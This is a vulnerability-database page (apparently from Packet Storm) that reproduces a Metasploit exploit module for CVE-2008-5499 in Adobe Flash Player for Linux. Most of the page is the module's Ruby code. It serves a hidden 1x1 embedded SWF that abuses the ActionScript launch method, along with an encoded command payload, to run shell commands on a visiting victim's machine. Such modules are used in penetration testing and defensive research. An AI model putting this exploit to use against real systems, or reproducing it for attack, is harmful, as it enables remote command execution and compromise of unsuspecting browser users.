Lucene search

K
packetstorm0a29406d9794e4f9b30b3c5d6702c708PACKETSTORM:112009
HistoryApr 20, 2012 - 12:00 a.m.

Adobe Flash Player ActionScript Launch Command Execution

2012-04-2000:00:00
0a29406d9794e4f9b30b3c5d6702c708
packetstormsecurity.com
33

0.969 High

EPSS

Percentile

99.6%

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',  
'Description' => %q{  
This module exploits a vulnerability in Adobe Flash Player for Linux,  
version 10.0.12.36 and 9.0.151.0 and prior.  
An input validation vulnerability allows command execution when the browser  
loads a SWF file which contains shell metacharacters in the arguments to  
the ActionScript launch method.  
  
The victim must have Adobe AIR installed for the exploit to work. This module  
was tested against version 10.0.12.36 (10r12_36).  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version  
],  
'References' =>  
[  
['CVE', '2008-5499'],  
['OSVDB', '50796'],  
['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],  
['URL', 'http://www.securityfocus.com/bid/32896/exploit']  
],  
'DefaultOptions' =>  
{  
'HTTP::compression' => 'gzip',  
'HTTP::chunked' => true  
},  
'Platform' => 'unix', # so unix cmd exec payloads are ok  
'Arch' => ARCH_CMD,  
'Targets' =>  
[  
[ 'Automatic', {}],  
],  
'DisclosureDate' => 'Dec 17 2008',  
'DefaultTarget' => 0))  
  
end  
  
def exploit  
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )  
fd = File.open( path, "rb" )  
@swf = fd.read(fd.stat.size)  
fd.close  
  
super  
end  
  
def on_request_uri(cli, request)  
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"  
trigger = @swf  
trigger_file = rand_text_alpha(rand(6)+3) + ".swf"  
  
obj_id = rand_text_alpha(rand(6)+3)  
  
if request.uri.match(/\.swf/i)  
print_status("#{msg} Sending Exploit SWF")  
send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })  
return  
end  
  
if request.uri.match(/\.txt/i)  
send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })  
return  
end  
  
html = <<-EOS  
<html>  
<head>  
</head>  
<body>  
<center>  
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">  
<param name="movie" value="#{get_resource}#{trigger_file}" />  
<embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"  
type="application/x-shockwave-flash"  
pluginspage="http://www.macromedia.com/go/getflashplayer">  
</embed>  
  
</object>  
</center>  
  
</body>  
</html>  
EOS  
  
print_status("#{msg} Sending HTML...")  
send_response(cli, html, { 'Content-Type' => 'text/html' })  
end  
end  
`